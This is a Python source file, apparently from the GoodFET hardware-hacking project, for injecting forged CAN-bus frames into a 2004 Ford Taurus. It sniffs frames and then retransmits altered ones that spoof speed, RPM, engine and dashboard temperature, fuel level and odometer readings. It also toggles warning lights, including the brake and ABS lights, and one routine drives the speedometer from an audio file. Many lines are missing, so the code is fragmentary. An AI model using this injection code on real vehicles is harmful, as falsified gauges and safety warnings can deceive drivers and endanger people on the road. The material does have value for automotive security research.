4 import csv, time, argparse;
8 from random import randrange
9 from GoodFETMCPCAN import GoodFETMCPCAN;
10 from experiments import experiments
11 from GoodFETMCPCANCommunication import GoodFETMCPCANCommunication
12 from intelhex import IntelHex;
18 class FordExperiments(experiments):
20 This class is a subclass of experiments and is a car specific module for
21 demonstrating and testing hacks.
23 def __init__(self, dataLocation = "../../contrib/ThayerData/"):
24 GoodFETMCPCANCommunication.__init__(self, dataLocation)
25 #super(FordExperiments,self).__init__(self) #initialize chip
28 def mimic1056(self,packetData,runTime):
31 self.spitSetup(self.freq)
32 #FIGURE out how to clear buffers
33 self.addFilter([1056, 1056, 1056, 1056,1056, 1056], verbose=False)
34 packet1 = self.client.rxpacket();
36 packetParsed = self.client.packet2parsed(packet1);
37 #keep sniffing till we read a packet
38 while( packet1 == None or packetParsed.get('sID') != 1056 ):
39 packet1 = self.client.rxpacket()
41 packetParsed = self.client.packet2parsed(packet1)
42 recieveTime = time.time()
43 packetParsed = self.client.packet2parsed(packet1)
44 if( packetParsed['sID'] != 1056):
45 print "Sniffed wrong packet"
47 countInitial = ord(packetParsed['db3']) #initial count value
49 #set data packet to match what was sniffed or at least what was input
52 if(packetData.get(idx) == None):
53 packet.append(ord(packetParsed.get(idx)))
55 packet.append(packetData.get(idx))
57 #### split SID into different regs
58 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
59 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
60 packet = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
61 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
63 packet[0],packet[1],packet[2],packet[3],packet[4],packet[5],packet[6],packet[7]]
65 self.client.txpacket(packet);
67 while( (time.time()-recieveTime) < runTime):
68 #care about db3 or packet[8] that we want to count at the rate that it is
69 dT = time.time()-tpast
71 db3 = (countInitial + math.floor((time.time()-recieveTime)/0.2))%255
73 self.client.txpacket(packet)
77 self.client.MCPrts(TXB0=True)
78 tpast = time.time() #update our transmit time on the one before
82 def cycledb1_1056(self,runTime):
86 #FIGURE out how to clear buffers
87 self.addFilter([1056, 1056, 1056, 1056,1056, 1056], verbose=False)
88 packet1 = self.client.rxpacket();
90 packetParsed = self.client.packet2parsed(packet1);
91 #keep sniffing till we read a packet
92 while( packet1 == None or packetParsed.get('sID') != 1056 ):
94 packet1 = self.client.rxpacket()
96 packetParsed = self.client.packet2parsed(packet1)
97 recieveTime = time.time()
98 packetParsed = self.client.packet2parsed(packet1)
99 if( packetParsed['sID'] != 1056):
100 print "Sniffed wrong packet"
103 #set data packet to match what was sniffed or at least what was input
106 packet.append(ord(packetParsed.get(idx)))
108 packet[1] = packetValue;
111 #### split SID into different regs
112 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
113 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
114 packet = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
115 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
116 # lower nibble is DLC
117 packet[0],packet[1],packet[2],packet[3],packet[4],packet[5],packet[6],packet[7]]
119 self.client.txpacket(packet);
121 while( (time.time()-recieveTime) < runTime):
122 #care about db3 or packet[8] that we want to count at the rate that it is
123 dT = time.time()-tpast
126 #temp = ((packetValue+1))%2
128 # pV = packetValue%255
134 self.client.txpacket(packet)
136 tpast = time.time() #update our transmit time on the one before
139 def getBackground(self,sId):
141 This method gets the background packets for the given id. This
142 is a simple "background" retriever in that it returns the packet
143 that is of the given id that was sniffed off the bus.
145 self.client.serInit()
147 self.addFilter([sId,sId,sId,sId,sId,sId])
148 packet1 = self.client.rxpacket();
150 packetParsed = self.client.packet2parsed(packet1);
151 #keep sniffing till we read a packet
152 startTime = time.time()
153 while( (packet1 == None or packetParsed.get('sID') != sId) and (time.time() - startTime) < 5):
154 packet1 = self.client.rxpacket()
157 packetParsed = self.client.packet2parsed(packet1)
158 if( packet1 == None or packetParsed.get('sID') != sId):
159 print "exiting without packet"
160 #print "returning", packetParsed
161 #recieveTime = time.time()
164 def cycle4packets1279(self):
165 self.client.serInit()
168 self.addFilter([1279, 1279, 1279, 1279, 1279, 1279], verbose = False)
169 packetParsed = self.getBackground(1279)
171 if (packetParsed[db0] == 16):
172 # if it's the first of the four packets, replace the value in db7 with 83
173 packetParsed[db7] = 83
174 # transmit new packet
175 self.client.txpacket(packetParsed)
177 # otherwise, leave it alone
178 # transmit same pakcet we read in
179 self.client.txpacket(packetParsed)
180 # print the packet we are transmitting
183 def oscillateMPH(self,runTime):
184 self.client.serInit()
186 #FIGURE out how to clear buffers
187 self.addFilter([513, 513, 513, 513,513, 513], verbose=False)
188 packetParsed = self.getBackground(513)
190 #set data packet to match what was sniffed or at least what was input
193 packet.append(packetParsed.get(idx))
195 packet[1] = packetValue;
198 #### split SID into different regs
199 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
200 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
201 packet = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
202 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
203 # lower nibble is DLC
204 packet[0],packet[1],packet[2],packet[3],packet[4],packet[5],packet[6],packet[7]]
206 self.client.txpacket(packet);
207 startTime = tT.time()
208 while( (tT.time()-startTime) < runTime):
209 dt = tT.time()-startTime
210 inputValue = ((2.0*math.pi)/20.0)*dt
211 value = 35*math.sin(inputValue)+70
217 #packet[9] = int(value)
218 packet[5] = int(value)
220 self.client.txpacket(packet)
222 def oscillateTemperature(self,runTime):
228 self.client.serInit()
230 #FIGURE out how to clear buffers
231 self.addFilter([1056, 1056, 1056, 1056,1056, 1056], verbose=False)
232 packetParsed = self.getBackground(1056)
234 #set data packet to match what was sniffed or at least what was input
237 packet.append(packetParsed.get(idx))
239 packet[1] = packetValue;
242 #### split SID into different regs
243 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
244 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
245 packet = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
246 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
247 # lower nibble is DLC
248 packet[0],packet[1],packet[2],packet[3],packet[4],packet[5],packet[6],packet[7]]
250 self.client.txpacket(packet);
251 startTime = tT.time()
252 while( (tT.time()-startTime) < runTime):
253 dt = tT.time()-startTime
254 inputValue = ((2.0*math.pi)/20.0)*dt
255 value = 30*math.sin(inputValue)+130
257 #packet[5] = int(value)
264 self.client.txpacket(packet)
266 #tpast = time.time() #update our transmit time on the one before
271 #reset eveything on the chip
272 self.client.serInit()
274 duration = 20; #seconds
277 listenPacket = [2, 9, 6, 153, 153, 153, 153, 153]
279 #actual response by the car
280 #r1 = [34, 88, 0, 0, 0, 0, 0, 0]
281 #r2 = [33, 75, 50, 78, 51, 46, 72, 69 ]
282 #r3 = [16, 19, 73, 4, 1, 70, 65, 66]
284 r1 = [34, 88, 0, 0, 0, 0, 0, 0]
285 r2 = [33, 75, 50, 78, 51, 46, 72, 69 ]
286 r3 = [16, 19, 73, 160, 159, 70, 65, 66]
289 SIDlow = (responseID & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
290 SIDhigh = (responseID >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
291 packet1 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
292 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
293 # lower nibble is DLC
294 r1[0],r1[1],r1[2],r1[3],r1[4],r1[5],r1[6],r1[7]]
295 packet2 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
296 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
297 # lower nibble is DLC
298 r2[0],r2[1],r2[2],r2[3],r2[4],r2[5],r2[6],r2[7]]
299 packet3 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
300 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
301 # lower nibble is DLC
302 r3[0],r3[1],r3[2],r3[3],r3[4],r3[5],r3[6],r3[7]]
304 self.multiPacketSpit(packet0 = r1, packet1 = r2, packet2 = r3, packet0rts = True, packet1rts = True, packet2rts = True)
306 #filter for the correct packet
307 self.filterForPacket(listenID, listenPacket[0],listenPacket[1], verbose = True)
308 self.client.rxpacket()
309 self.client.rxpacket() # flush buffers if there is anything
310 startTime = tT.time()
311 while( (tT.time() -startTime) < duration):
312 packet = self.client.rxpacket()
314 sid = ord(packet[0])<<3 | ord(packet[1])>>5
315 if( sid == listenID):
316 byte3 = ord(packet[6])
317 if( byte3 == listenPacket[3]):
318 print "SendingPackets!"
320 self.multpackSpit(packet0rts=True,packet1rts=True,packet2rts=True)
322 def setScanToolTemp(self,temp):
323 self.client.serInit()
326 self.addFilter([2024, 2024, 2024])
327 self.client.rxpacket()
328 self.client.rxpacket()
329 self.client.rxpacket()
330 SIDlow = (2024 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
331 SIDhigh = (2024 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
333 startTime = time.time()
334 #while((time.time() - startTime) < 10):
338 # catch a packet and check its db4 value
339 while (packet == None):
340 packet=self.client.rxpacket();
343 newTemp = math.ceil(level/1.8 + 22)
344 #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
347 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
348 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
349 # lower nibble is DLC
350 ord(packet[5]),ord(packet[6]),ord(packet[7]),newTemp,ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
352 # load new packet into TXB0 and check time
353 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
354 starttime = time.time()
356 # spit new value for 1 second
357 while (time.time()-starttime < 10):
358 self.multiPacketSpit(packet0rts=True)
360 def setEngineTemp(self,temp):
361 self.client.serInit()
364 self.addFilter([1056, 1056, 1056,1056,1056,1056])
365 self.client.rxpacket()
366 self.client.rxpacket()
367 self.client.rxpacket()
368 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
369 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
371 startTime = time.time()
372 #while((time.time() - startTime) < 10):
376 # catch a packet and check its db4 value
377 while (packet == None):
378 packet=self.client.rxpacket();
381 newTemp = int(math.ceil(level/1.8 + 22))
382 #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
385 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
386 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
387 # lower nibble is DLC
388 newTemp,ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
390 # load new packet into TXB0 and check time
391 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
392 starttime = time.time()
394 # spit new value for 1 second
395 while (time.time()-starttime < 10):
396 self.multiPacketSpit(packet0rts=True)
398 def overHeatEngine(self):
399 self.client.serInit()
402 self.addFilter([1056, 1056, 1056])
403 packet = self.getBackground(1056)
404 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
405 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
407 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
408 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
409 # lower nibble is DLC
410 0xfa,packet['db1'],packet['db2'],packet['db3'],packet['db4'],packet['db5'],packet['db6'],packet['db7']]
411 startTime = time.time()
412 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
413 while( time.time()- startTime < 10):
414 self.multiPacketSpit(packet0rts=True)
416 def runOdometer(self):
417 self.client.serInit()
420 self.addFilter([1056, 1056, 1056])
421 packet = self.getBackground(1056)
422 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
423 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
424 odomFuzz = random.randint(1,254)
426 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
427 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
428 # lower nibble is DLC
429 packet['db0'],packet['db1'],packet['db2'],packet['db3'],packet['db4'],packet['db5'],packet['db6'],packet['db7']]
431 startTime = time.time()
432 packet[6] = odomFuzz;
433 while( time.time()- startTime < 10):
434 odomFuzz = random.randint(1,254)
435 newPacket[6] = odomFuzz
436 self.client.txpacket(newPacket)
438 def setDashboardTemp(self, temp):
439 self.client.serInit()
442 self.addFilter([1056, 1056, 1056])
443 self.client.rxpacket()
444 self.client.rxpacket()
445 self.client.rxpacket()
446 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
447 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
449 startTime = time.time()
450 #while((time.time() - startTime) < 10):
454 # catch a packet and check its db4 value
455 while (packet == None):
456 packet=self.client.rxpacket();
459 newTemp = math.ceil(level/1.8 + 22)
460 #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
463 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
464 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
465 # lower nibble is DLC
466 newTemp,ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
468 # load new packet into TXB0 and check time
469 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
470 starttime = time.time()
472 # spit new value for 1 second
473 while (time.time()-starttime < 10):
474 self.multiPacketSpit(packet0rts=True)
477 def warningLightsOn(self,checkEngine, checkTransmission, transmissionOverheated, engineLight, battery, fuelCap, checkBreakSystem,ABSLight, dashB):
479 if( checkBreakSystem == 1 or ABSLight == 1):
480 SIDlow = (530 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
481 SIDhigh = (530 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
482 print "looking for 530"
483 packet = self.getBackground(530)
485 packet2 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
486 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
487 # lower nibble is DLC
488 packet['db0'],packet['db1'],packet['db2'],packet['db3'],packet['db4'],packet['db5'],packet['db6'],packet['db7']]
489 if( checkBreakSystem == 1 and ABSLight == 1):
491 elif( checkBreakSystem == 0 and ABSLight == 1):
493 elif(checkBreakSystem==1 and ABSLight == 0):
500 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
501 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
502 print "looking for 1056"
503 packet = self.getBackground(1056)
505 packet1 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
506 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
507 # lower nibble is DLC
508 packet['db0'],packet['db1'],packet['db2'],packet['db3'],packet['db4'],packet['db5'],packet['db6'],packet['db7']]
509 if( checkEngine == 1):
512 if( checkTransmission == 1):
515 if( transmissionOverheated == 1):
518 if( engineLight == 1):
530 self.client.serInit()
532 # load new packet into TXB0 and check time
533 self.multiPacketSpit(packet0=packet1,packet1=packet2, packet0rts=True,packet1rts=packet2rts )
534 starttime = time.time()
536 # spit new value for 1 second
537 while ((time.time()-starttime) < 10):
538 self.multiPacketSpit(packet0rts=True,packet1rts = packet2rts)
540 def fakeScanToolFuelLevel(self,level):
541 self.client.serInit()
544 self.addFilter([2024, 2024, 2024])
545 self.client.rxpacket()
546 self.client.rxpacket()
547 self.client.rxpacket()
548 SIDlow = (2024 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
549 SIDhigh = (2024 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
551 startTime = time.time()
552 #while((time.time() - startTime) < 10):
556 # catch a packet and check its db4 value
557 while (packet == None):
558 packet=self.client.rxpacket();
560 level = int(level/.4)
561 #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
564 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
565 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
566 # lower nibble is DLC
567 3,65,47,level,ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
569 # load new packet into TXB0 and check time
570 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
571 starttime = time.time()
573 # spit new value for 1 second
574 while (time.time()-starttime < 10):
575 self.multiPacketSpit(packet0rts=True)
577 def fakeOutsideTemp(self,level):
578 self.client.serInit()
581 self.addFilter([2024, 2024, 2024,2024,2024,2024])
582 self.client.rxpacket()
583 self.client.rxpacket()
584 self.client.rxpacket()
585 SIDlow = (2024 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
586 SIDhigh = (2024 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
588 startTime = time.time()
589 #while((time.time() - startTime) < 10):
593 # catch a packet and check its db4 value
594 while (packet == None):
595 packet=self.client.rxpacket();
597 newTemp = int(math.ceil(level/1.8 + 22))
598 #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
601 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
602 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
603 # lower nibble is DLC
604 03,65,70,newTemp,0,0,0,0]
606 # load new packet into TXB0 and check time
607 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
608 starttime = time.time()
610 # spit new value for 1 second
611 while (time.time()-starttime < 10):
612 self.multiPacketSpit(packet0rts=True)
615 def fakeAbsTps(self,level):
616 self.client.serInit()
619 self.addFilter([2024, 2024, 2024])
620 self.client.rxpacket()
621 self.client.rxpacket()
622 self.client.rxpacket()
623 SIDlow = (2024 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
624 SIDhigh = (2024 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
626 startTime = time.time()
627 #while((time.time() - startTime) < 10):
631 # catch a packet and check its db4 value
632 while (packet == None):
633 packet=self.client.rxpacket();
635 abstps = int(math.ceil(level/.39))
639 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
640 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
641 # lower nibble is DLC
642 ord(packet[5]),ord(packet[6]),ord(packet[7]),abstps,ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
644 # load new packet into TXB0 and check time
645 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
646 starttime = time.time()
648 # spit new value for 1 second
649 while (time.time()-starttime < 10):
650 self.multiPacketSpit(packet0rts=True)
654 def mphToByteValue(self, mph):
655 return ( mph + 63.5 ) / 1.617
657 def ByteValuToMph(self, value):
658 return 1.617*ord(packet[9]) - 63.5
660 def setMPH(self, mph):
661 self.client.serInit()
664 self.addFilter([513, 513, 513])
665 self.client.rxpacket()
666 self.client.rxpacket()
667 self.client.rxpacket()
668 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
669 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
671 startTime = time.time()
672 #while((time.time() - startTime) < 10):
676 # catch a packet and check its db4 value
677 while (packet == None):
678 packet=self.client.rxpacket();
680 #print self.client.packet2str(packet)
682 #print "DB4 = %02d " %ord(packet[9])
684 #print "Current MPH = 1.617(%d)-63.5 = %d" %(ord(packet[9]), mph)
686 # calculate our new mph and db4 value
688 newSpeed = self.mphToByteValue(mph)
689 #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
692 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
693 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
694 # lower nibble is DLC
695 ord(packet[5]),ord(packet[6]),ord(packet[7]),ord(packet[8]),int(newSpeed),ord(packet[10]),ord(packet[11]),ord(packet[12])]
697 # load new packet into TXB0 and check time
698 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
699 starttime = time.time()
701 # spit new value for 1 second
702 while (time.time()-starttime < 10):
703 self.multiPacketSpit(packet0rts=True)
706 def speedometerHack(self, inputs):
708 self.client.serInit()
711 self.addFilter([513, 513, 513])
713 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
714 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
720 # catch a packet and check its db4 value
721 while (packet == None):
722 packet=self.client.rxpacket();
724 print self.client.packet2str(packet)
726 print "DB4 = %02d " %ord(packet[9])
727 mph = 1.617*ord(packet[9]) - 63.5
728 print "Current MPH = 1.617(%d)-63.5 = %d" %(ord(packet[9]), mph)
730 # calculate our new mph and db4 value
731 mph = mph + inputs[0];
732 newSpeed = ( mph + 63.5 ) / 1.617
733 print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
736 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
737 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
738 # lower nibble is DLC
739 ord(packet[5]),ord(packet[6]),ord(packet[7]),ord(packet[8]),int(newSpeed),ord(packet[10]),ord(packet[11]),ord(packet[12])]
741 # load new packet into TXB0 and check time
742 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
743 starttime = time.time()
745 # spit new value for 1 second
746 while (time.time()-starttime < 1):
747 self.multiPacketSpit(packet0rts=True)
749 def rpmToByteValue(self, rpm):
750 value = ( rpm + 61.88 ) / 64.5
753 def ValueTorpm(self, value):
754 rpm = 64.5*value - 61.88
757 def setRPM(self, rpm):
758 self.client.serInit()
761 self.addFilter([513, 513, 513,513])
763 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
764 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
767 self.client.rxpacket()
768 self.client.rxpacket()
769 self.client.rxpacket()
771 startTime = tT.time()
772 while((tT.time() - startTime )< 10):
776 # catch a packet and check its db4 value
777 while (packet == None):
778 packet=self.client.rxpacket();
780 #print self.client.packet2str(packet)
782 #print "DB4 = %02d " %ord(packet[5])
784 #print "Current RPM = 64.5(%d)-61.88 = %d" %(ord(packet[5]), rpm)
786 newRPM = self.rpmToByteValue(rpm)
787 #print "Fake RPM = 64.5(%d)-61.88 = %d" %(newRPM, rpm)
790 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
791 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
792 # lower nibble is DLC
793 int(newRPM),ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
795 # load new packet into TXB0 and check time
796 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
797 starttime = time.time()
799 # spit new value for 1 second
800 while (time.time()-starttime < 1):
801 self.multiPacketSpit(packet0rts=True)
803 def rpmHack(self, inputs):
805 This method will increase the rpm by the given rpm amount.
808 @param inputs: Single element of a list that corresponds to the amount the user
812 self.client.serInit()
815 self.addFilter([513, 513, 513])
817 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
818 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
819 startTime = tT.time()
820 while((tT.time() - startTime )< 10):
824 # catch a packet and check its db4 value
825 while (packet == None):
826 packet=self.client.rxpacket();
828 print self.client.packet2str(packet)
830 print "DB4 = %02d " %ord(packet[5])
831 rpm = 64.5*ord(packet[5]) - 61.88
832 print "Current RPM = 64.5(%d)-61.88 = %d" %(ord(packet[5]), rpm)
834 # calculate our new mph and db4 value
835 rpm = rpm + inputs[0];
836 newRPM = ( rpm + 61.88 ) / 64.5
838 print "Fake RPM = 64.5(%d)-61.88 = %d" %(newRPM, rpm)
841 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
842 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
843 # lower nibble is DLC
844 int(newRPM),ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
846 # load new packet into TXB0 and check time
847 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
848 starttime = time.time()
850 # spit new value for 1 second
851 while (time.time()-starttime < 1):
852 self.multiPacketSpit(packet0rts=True)
854 def imbeethovenbitch(self):
857 ### USUAL SETUP STUFF ######
858 self.client.serInit()
860 self.addFilter([513, 513, 513,513])
861 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
862 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
865 self.client.rxpacket()
866 self.client.rxpacket()
867 self.client.rxpacket()
872 #catch a packet to mutate
873 while (packet == None):
874 packet=self.client.rxpacket();
875 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
876 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
877 # lower nibble is DLC
878 ord(packet[5]),ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
881 # NOW THE FUN STUFF!!!!!
883 music = wave.open("../../contrib/ted/beethovensfifth.wav.wav", 'r');
884 print "number of frames: %d " %music.getnframes()
885 print "number of channels: %d " %music.getnchannels()
886 print "sample width: %d " %music.getsampwidth()
887 print "framerate: %d " %music.getframerate()
888 print "compression: %s " %music.getcompname()
891 numFramesToRead = music.getframerate()*.1 # grab .1s of audio
897 sample = music.readframes(numFramesToRead) # grab .1s of audio
901 for i in range(0, length,4):
902 runningSum += ord(sample[i]) #average the dual-channel
903 runningSum += ord(sample[i+2])
905 avg = runningSum/(length / 2) # we used 2 of every 4 frames, so divide length by 2
907 val = (40 + 5*(avg-120)) # normalize to speedometer range of values
909 print "speedometerVal = %f " %val;
910 print "speed = %f" %(1.617*val-63.5) # speed we're trying to display
912 if (val > 255): # ensure we don't run off acceptable range
917 newPacket[9] = int(val) # write it to the packet
919 # load new packet into TXB0 and check time
920 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
921 starttime = time.time()
923 # spit new value for 1 second
924 while (time.time()-starttime < .1):
925 self.multiPacketSpit(packet0rts=True)
929 # normalize to our range of values (conversion 1.6167*x-63.5
933 #number of frames: 7133184
934 #number of channels: 2
935 #sample width: 2 --> 2 bytes per sample
938 def engineDiagnostic(self, data):
940 self.addFilter([513, 513, 513,513])
942 startTime = tT.time()
943 while((tT.time() - startTime ) < 15):
946 #catch a packet to decode
947 while (packet == None):
948 packet=self.client.rxpacket();
950 rpm = 64.5 * ord(packet[5]) - 61.88
951 mph = 1.617 * ord(packet[9]) - 63.5
953 data.put("Engine RPM: %d Current Speed: %d mph"%(rpm, mph))
960 if __name__ == "__main__":
962 parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,description='''\
964 Run Hacks on a Ford taurus 2004:
970 parser.add_argument('verb', choices=['speedometerHack', 'rpmHack', 'thefifth']);
971 parser.add_argument('-v', '--variable', type=int, action='append', help='Input values to the method of choice', default=None);
974 args = parser.parse_args();
975 inputs = args.variable
976 fe = FordExperiments("../../contrib/ThayerData/");
978 if( args.verb == 'speedometerHack'):
979 fe.speedometerHack(inputs=inputs)
980 if( args.verb == 'rpmHack'):
981 fe.rpmHack(inputs=inputs)
982 elif( args.verb == 'fakeVIN'):
984 elif( args.verb == 'thefifth'):
985 fe.imbeethovenbitch()
projects / goodfet / blob